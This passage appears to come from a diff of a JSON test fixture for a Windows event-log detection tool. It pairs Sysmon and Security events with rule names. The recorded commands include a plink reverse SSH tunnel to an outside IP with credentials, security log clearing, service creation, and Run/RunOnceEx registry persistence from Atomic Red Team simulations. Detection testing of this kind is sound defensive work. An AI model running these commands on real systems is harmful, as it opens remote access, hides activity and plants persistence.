(WinBuild.160101.0800)","Hashes":"SHA1=391FF1F690C0912C217B3CF625900D4F50128867,MD5=88EA810385F455C74306D71C4879C61C,SHA256=4774A931C9D97828323C9E829917D82C27A05DAB9FEA6A0CEF9EBBA59942231F,IMPHASH=7A8EC2645C24D85DE8216D63022623C0","Image":"C:\\Windows\\System32\\control.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-56A3-5D45-0000-0020B3D31800","LogonId":"0x18d3b3","ParentCommandLine":"\"C:\\Windows\\system32\\sdclt.exe\" ","ParentImage":"C:\\Windows\\System32\\sdclt.exe","ParentProcessGuid":"747F3D96-A105-5D46-0000-00103BEBBC03","ParentProcessId":4532,"ProcessGuid":"747F3D96-A106-5D46-0000-00107201BD03","ProcessId":1380,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-04 
09:10:30.346"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5702,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-04T09:10:30.752830Z"}},"Version":5}}}}] \ No newline at end of file +[{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"PC01.example.corp","Correlation":null,"EventID":1102,"EventRecordID":227693,"Execution_attributes":{"ProcessID":820,"ThreadID":608},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-02-13T18:01:41.593830Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0xaf855","SubjectUserName":"admin01","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-1108"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Exfiltration and Tunneling Tools 
Execution"],"event":{"Event":{"EventData":{"CommandLine":"","NewProcessId":"0xcfc","NewProcessName":"C:\\Users\\user01\\Desktop\\plink.exe","ProcessId":"0xe60","SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x2ed80","SubjectUserName":"user01","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-1106","TokenElevationType":"%%1936"},"System":{"Channel":"Security","Computer":"PC01.example.corp","Correlation":null,"EventID":4688,"EventRecordID":227714,"Execution_attributes":{"ProcessID":4,"ThreadID":56},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider_attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"},"Security":null,"Task":13312,"TimeCreated_attributes":{"SystemTime":"2019-02-13T18:03:28.318440Z"},"Version":1}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Exfiltration and Tunneling Tools Execution"],"event":{"Event":{"EventData":{"CommandLine":"plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test","Company":"Simon Tatham","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Command-line SSH, Telnet, and Rlogin client","FileVersion":"Release 0.70","Hashes":"SHA1=7806AD24F669CD8BB9EBE16F87E90173047F8EE4","Image":"C:\\Users\\IEUser\\Desktop\\plink.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-D6AB-5C67-0000-002056660200","LogonId":"0x26656","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-D92A-5C67-0000-0010CB580900","ParentProcessId":3904,"ProcessGuid":"365ABB72-DFAD-5C67-0000-0010E0811500","ProcessId":2312,"Product":"PuTTY suite","RuleName":"","TerminalSessionId":1,"User":"PC01\\IEUser","UtcTime":"2019-02-16 
10:02:21.934"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1940899,"Execution_attributes":{"ProcessID":1728,"ThreadID":412},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-02-16T10:02:21.934438Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-07-19 14:43:46.619","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ProcessId":3912,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\phvj2yfb\\phvj2yfb.dll","UtcTime":"2019-07-19 14:43:46.619"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":3575,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:43:46.623217Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["New Service Creation"],"event":{"Event":{"EventData":{"CommandLine":"sc.exe create AtomicTestService binPath= C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe","Company":"Microsoft 
Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Service Control Manager Configuration Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF","Image":"C:\\Windows\\System32\\sc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"sc.exe create AtomicTestService binPath= C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D738-5D31-0000-001046A02600","ParentProcessId":4216,"ProcessGuid":"747F3D96-D738-5D31-0000-001098A22600","ProcessId":1700,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence or Exec - Services Management","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:08.181"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3577,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:08.185344Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD 
(0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start","UtcTime":"2019-07-19 14:44:08.197"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3578,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:08.221461Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ImagePath","UtcTime":"2019-07-19 14:44:08.197"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3579,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:08.240767Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Stop Windows Service"],"event":{"Event":{"EventData":{"CommandLine":"sc.exe stop 
AtomicTestService","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Service Control Manager Configuration Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF","Image":"C:\\Windows\\System32\\sc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"sc.exe stop AtomicTestService\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D739-5D31-0000-00104CB72600","ParentProcessId":5000,"ProcessGuid":"747F3D96-D739-5D31-0000-0010B6B92600","ProcessId":980,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence or Exec - Services Management","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:09.172"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3584,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:09.176040Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start","UtcTime":"2019-07-19 
14:44:09.291"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3587,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:09.310810Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000002)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start","UtcTime":"2019-07-19 14:44:26.166"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3589,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:26.222431Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ImagePath","UtcTime":"2019-07-19 
14:44:26.166"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3590,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:26.246190Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start","UtcTime":"2019-07-19 14:44:47.416"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3592,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:49.679320Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Reg Add RUN Key"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D765-5D31-0000-001027B72800","ProcessId":6584,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:53.201"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3593,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:53.219598Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Direct Autorun Keys Modification","Reg Add RUN Key"],"event":{"Event":{"EventData":{"CommandLine":"REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D765-5D31-0000-001027B72800","ParentProcessId":6584,"ProcessGuid":"747F3D96-D765-5D31-0000-001086B92800","ProcessId":2068,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:53.244"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3594,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:53.258049Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Path\\AtomicRedTeam.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D765-5D31-0000-001086B92800","ProcessId":2068,"RuleName":"Persistence - via Run key","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Atomic Red Team","UtcTime":"2019-07-19 
14:44:53.261"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3595,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:53.292455Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D765-5D31-0000-0010D7BD2800","ProcessId":5824,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:44:53.314"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3596,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:53.330492Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D765-5D31-0000-0010D7BD2800","ParentProcessId":5824,"ProcessGuid":"747F3D96-D765-5D31-0000-001022C02800","ProcessId":2912,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:44:53.337"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3597,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:53.349171Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Reg Add RUN Key"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \" C:\\Path\\AtomicRedTeam.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D772-5D31-0000-0010BEE52800","ProcessId":3216,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:45:06.056"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3600,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:06.075725Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Direct Autorun Keys Modification","Reg Add RUN Key"],"event":{"Event":{"EventData":{"CommandLine":"REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d C:\\Path\\AtomicRedTeam.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \" C:\\Path\\AtomicRedTeam.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D772-5D31-0000-0010BEE52800","ParentProcessId":3216,"ProcessGuid":"747F3D96-D772-5D31-0000-001010E82800","ProcessId":3772,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
